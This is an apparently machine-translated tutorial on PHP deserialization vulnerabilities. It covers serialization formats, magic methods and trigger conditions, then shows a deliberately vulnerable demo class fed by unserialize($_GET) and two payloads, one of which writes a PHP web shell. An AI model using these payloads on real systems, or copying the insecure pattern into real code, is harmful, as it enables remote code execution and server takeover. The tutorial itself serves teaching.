Principles and examples of PHP deserialization vulnerability

PHP Deserialization

Serialization and deserialization

Serialization is to change an object into a string that can be transmitted .

During serialization, variables with different attributes will be changed in different ways

public When serializing the properties of , Directly display the attribute name protected When serializing the properties of , Will be added before the attribute name 0x00*0x00, Its length will increase 3 private When serializing the properties of , Will be added before the attribute name 0x00classname0x00, Its length will increase Class name length +2

Deserialization is to restore the serialized string to an object , Then continue to use it in the following code .

PHP Magical function

__construct() # Class constructor 
__destruct() # Destructor of class , Execute this function when the object is destroyed 
__call() # Called when an invocable method is invoked in an object 
__callStatic() # Call in an static way when an invocable method is called 
__get() # Call when you get a member variable of a class 
__set() # Called when setting a member variable of a class 
__isset() # When called on an inaccessible property isset() or empty() Called when the 
__unset() # When called on an inaccessible property unset() When called .
__sleep() # perform serialize() when , This function will be called first 
__wakeup() # perform unserialize() when , This function will be called first 
__toString() # The response method when a class is treated as a string 
__invoke() # The response method when an object is called by calling a function 
__set_state() # call var_export() When exporting a class , This static method will be called .
__clone() # Called when the object copy is complete 
__autoload() # Trying to load an undefined class 
__debugInfo() # Print the required debug information serialization structure 

Deserialization vulnerability

brief introduction

PHP The deserialization vulnerability is also called PHP Object injection , Is a very common vulnerability , Although this type of vulnerability is somewhat difficult to exploit , But once used successfully, it will have very dangerous consequences . The root cause of the vulnerability is that the program does not detect the deserialized string entered by the user , Cause the deserialization process to be maliciously controlled , This leads to code execution 、getshell And a series of uncontrollable consequences . The deserialization vulnerability is not PHP specific , It also exists in Java、Python And other languages , But its principle is basically the same .

principle

The serialized string entered by the user was not detected , This allows an attacker to control the deserialization process , This leads to code execution ,SQL Inject , Directory traversal and other uncontrollable consequences . Some magic methods are automatically triggered during deserialization .

The trigger condition

unserialize The variables of a function are controllable ,php There are available classes in the file , There are magic functions in class

Example

<?php
class demo{
 public $name;
 public $age;
 function __destruct(){
        $a = $this->name;
        $a($this->age);
 }
}
$h = new demo();
echo serialize($h);
unserialize($_GET['h']);
?>

payload

payload:( Apply to destruct() wakeup())
O:4:"demo":2:{s:4:"name";s:6:"assert";s:3:"age";s:9:"phpinfo()";}
 Trojan horse 
O:4:"demo":2:{s:4:"name";s:6:"assert";s:3:"age";s:64:"fputs(fopen('shell.php','w'),'<?php eval($_REQUEST["cmd"]);?>');";}

We can see when , After creating the object , The __destruct() function , This function also executes automatically , That is to say serialize() Functions and unserialize() Function destroyed object , Triggered the execution of the magic function .

General process ：